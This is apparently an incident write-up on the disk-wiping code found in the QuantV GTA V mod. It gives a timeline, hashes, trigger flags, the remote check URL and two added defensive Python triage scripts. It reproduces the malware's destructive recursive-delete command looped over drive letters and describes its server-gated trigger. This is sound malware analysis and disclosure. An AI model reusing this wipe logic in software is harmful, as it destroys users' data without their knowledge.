This topic contains a timeline and rough summary on the findings regarding the ‘QuantV’ disk wiping incident.
Context
QuantV is a third-party ‘graphics mod pack’ for GTA V, being sold on Patreon by its creator (‘Quant’). It bundles a few plugin DLLs that set shader parameters for the ENBSeries shader patching library and help with taking screenshots.
Timeline
- 2022-09-03T11:48:00Z: I was informed that there was some lore being spread regarding ‘a trojan virus with drive exterminator’ in the native DLLs bundled with QuantV.
- 2022-09-03T11:52:00Z: A buyer sent a copy of a legitimately purchased version of QuantV to me for analysis.
- 2022-09-03T12:07:00Z: Analysis started on `QuantV.asi`, with a file time of 2022-09-01T12:06:34Z, a PE timestamp of 2022-08-29T21:34:35Z, and a SHA256 hash of `5cfd77770ebbb279f6d998c7d000724259a6c9bb013f3a70a3940337441bf5e6`.
- 2022-09-03T12:14:00Z: Code that contained a list of drive letters and called `system()` on some obfuscated (XOR’d) string was discovered. Investigation continued.
- 2022-09-03T12:51:00Z: A tweet informing about this was posted. As the lore was already being spread, this was considered a responsible course of action.
- 2022-09-03T19:30:00Z: More investigation was performed, `enbhelper.dll` was confirmed as malicious as well, and it appears that a non-functional internet connection will ‘nullify’ the HTTP check at least. The plugin also seems to use/store a flag in some `.ini` file, as well as a `x64\data\errorcodes\romanian.txt` in the game directory being used as a trigger flag.
- 2022-09-04T17:13:00Z: A newer build has been released (with file times of September 4, 2022, and a few days newer PE timestamp) which does not include the malicious code in `QuantV.asi`, though it still is included in `enbhelper.dll`. Regrettably, the author denies having been involved in this, instead going with FUD explanations, looking like a cover-up operation. Notably, however, both versions very much look built from the same source code, and the server checks using the same XOR string library are still in.
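The timeline mentions that the wipe command is passed to `system()` as an XOR’d string, which is why plain string dumps of the plugin do not show `rmdir`. The following is an added triage example for this write-up (not the analyst’s own tooling, and not code from QuantV): it brute-forces every single-byte XOR key against a small list of indicator strings taken from this page and reports where each one decodes inside a binary blob. The sample blob is constructed here; the assumption that the obfuscation is a single-byte XOR is mine, since the page does not describe the ‘XOR string library’ in detail. A multi-byte or per-string key would need a known-plaintext variant instead.

```python
"""
Single-byte XOR indicator scanner (added example, not the original analysis tooling).
Brute-forces all 256 keys for each indicator and reports where it decodes in a blob.
"""
from typing import Iterable, List, Tuple

# Indicator strings taken from the write-up; everything else in this file is constructed.
INDICATORS = [
    b"rmdir /s /q ",
    b"quantv.xyz",
    b"romanian.txt",
    b"Desaturate Radius=",
]


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (key 0 leaves the data unchanged)."""
    return bytes(b ^ key for b in data)


def find_xored_indicators(blob: bytes, indicators: Iterable[bytes] = INDICATORS) -> List[Tuple[int, int, bytes]]:
    """Return sorted (offset, key, indicator) triples for every indicator that
    appears in `blob` under some single-byte XOR key. Key 0 covers plaintext
    hits, so the same scan also works on an unobfuscated build."""
    hits: List[Tuple[int, int, bytes]] = []
    for ind in indicators:
        for key in range(256):
            needle = xor_bytes(ind, key)
            start = blob.find(needle)
            while start != -1:
                hits.append((start, key, ind))
                start = blob.find(needle, start + 1)
    return sorted(hits)


def build_sample_blob() -> bytes:
    """Constructed stand-in for a plugin image: zero padding around three
    indicator strings, two of them XOR'd with different keys and one in plain."""
    return b"".join([
        bytes(64),
        xor_bytes(b"rmdir /s /q ", 0x5A),  # offset 64, key 0x5A
        bytes(32),
        xor_bytes(b"quantv.xyz", 0x13),    # offset 108, key 0x13
        bytes(16),
        b"romanian.txt",                   # offset 134, key 0 (plaintext)
        bytes(16),
    ])


if __name__ == "__main__":
    import sys

    # Pass a file path to scan a real binary; with no argument the constructed blob is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_blob()
    for off, key, ind in find_xored_indicators(data):
        print(f"0x{off:08x}  key=0x{key:02x}  {ind.decode()}")
```

Running it against a real sample is a quick way to confirm whether a given build still carries the obfuscated command and server hostname before spending time in a disassembler; wide (UTF-16) strings are not covered, so a hit count of zero is not proof of absence.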
Factual information
- ~~Only `QuantV.asi` is affected. `enbfeeder.asi` and `enbhelper.dll` seem unimpacted.~~ ~~Only `QuantV.asi` has the HTTP code to fetch status, but `enbhelper.dll` will apply a pending ‘disk wipe’ as well.~~ Both `enbhelper.dll` and `QuantV.asi` contain the full disk wipe/HTTP check logic. This wasn’t found initially as compiler settings were different.
- It’s unlikely that this was added by a ‘leaker’ as some rumors say. The way this is integrated into the code shows that this was likely done by someone with access to either original or reverse-engineered source code for the .asi file, and the chain I’ve received the sample from corroborates this.
- Antivirus software generally does not pick this up as they rely on a) known signatures or b) behavioral analysis. Since this is a plugin, preemptive behavioral analysis does not apply.
- There is no sign of this version of the .asi executing any other commands than this `rmdir` chain.
- Similarly, there’s no sign of other persistence methods, though there are some file read/writes, and it may be the case the .asi will edit some `.ini` files in the `enbseries` folder to ‘worm’ in case a pirated copy is spread further.
- The ‘check’ is done using an HTTP API, ~~the details of which have not been investigated at this time~~ located at `http://quantv.xyz/updater`, presumably with a POST request of `code=...`, involving the `Desaturate Radius=` value in `enbseries/enbeffect.fx.ini`, which is actually a unique user ID. The library cpp-httplib is used, with `httplib::` renamed to `enb::`. The main ‘trigger’ is this API returning (or not returning) `true`.
- The command executed amounts to `system(("rmdir /s /q " + drive_letter).c_str());`. This will remove files that the user has access to read/write, which could be a lot.
- There have been reports of this being used in the wild, and this existing in pirated copies of an ‘August release’ as well.
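The indicators above (the analysed build’s SHA256, the `romanian.txt` trigger flag, and the per-user ID in `enbeffect.fx.ini`) are enough for a quick host check of a game directory. This is an added example for this write-up, not tooling from the analysis or from the project: it hashes `QuantV.asi` and compares it against the hash given on this page, checks whether the trigger flag file exists, and extracts the `Desaturate Radius=` value. The fake game directory it builds for demonstration is constructed test data; the placeholder user ID and file contents are mine.

```python
"""
Host triage for the indicators in this write-up (added example; not the original tooling).
"""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, Optional

# Values taken from the write-up.
ANALYSED_ASI_SHA256 = "5cfd77770ebbb279f6d998c7d000724259a6c9bb013f3a70a3940337441bf5e6"
TRIGGER_FLAG = Path("x64") / "data" / "errorcodes" / "romanian.txt"
ID_INI = Path("enbseries") / "enbeffect.fx.ini"
ID_KEY = "Desaturate Radius"


def sha256_file(path: Path) -> str:
    """Stream the file through SHA256 so large plugins do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def read_ini_value(path: Path, key: str) -> Optional[str]:
    """Return the value of the first `key=` line, or None. A plain line scan is used
    rather than configparser because ENB ini files are not guaranteed to be well-formed."""
    if not path.is_file():
        return None
    for line in path.read_text(encoding="utf-8", errors="replace").splitlines():
        name, sep, value = line.partition("=")
        if sep and name.strip().lower() == key.lower():
            return value.strip()
    return None


def triage_game_dir(game_dir: str) -> Dict[str, object]:
    """Collect the page's indicators from a game directory. Missing files are reported, not raised."""
    root = Path(game_dir)
    asi = root / "QuantV.asi"
    asi_hash = sha256_file(asi) if asi.is_file() else None
    return {
        "quantv_asi_present": asi.is_file(),
        "quantv_asi_sha256": asi_hash,
        "matches_analysed_build": asi_hash == ANALYSED_ASI_SHA256,
        "trigger_flag_present": (root / TRIGGER_FLAG).is_file(),
        "user_id": read_ini_value(root / ID_INI, ID_KEY),
    }


def make_constructed_game_dir() -> str:
    """Build a throwaway fake game directory (constructed test data, not real plugin files)."""
    root = Path(tempfile.mkdtemp())
    (root / TRIGGER_FLAG).parent.mkdir(parents=True, exist_ok=True)
    (root / ID_INI).parent.mkdir(parents=True, exist_ok=True)
    (root / "QuantV.asi").write_bytes(b"MZ constructed placeholder, not the real plugin")
    (root / TRIGGER_FLAG).write_text("1")
    (root / ID_INI).write_text("[EFFECT]\nDesaturate Radius=example-user-id-0001\n")
    return str(root)


if __name__ == "__main__":
    import sys

    # Pass the GTA V directory to check a real install; with no argument a constructed one is used.
    target = sys.argv[1] if len(sys.argv) > 1 else make_constructed_game_dir()
    for name, value in triage_game_dir(target).items():
        print(f"{name}: {value}")
```

A hash mismatch only says the file is not the specific build analysed here (the later build discussed in the timeline will not match either), so the trigger flag and the plugin’s presence are the more useful signals for deciding whether to remove it.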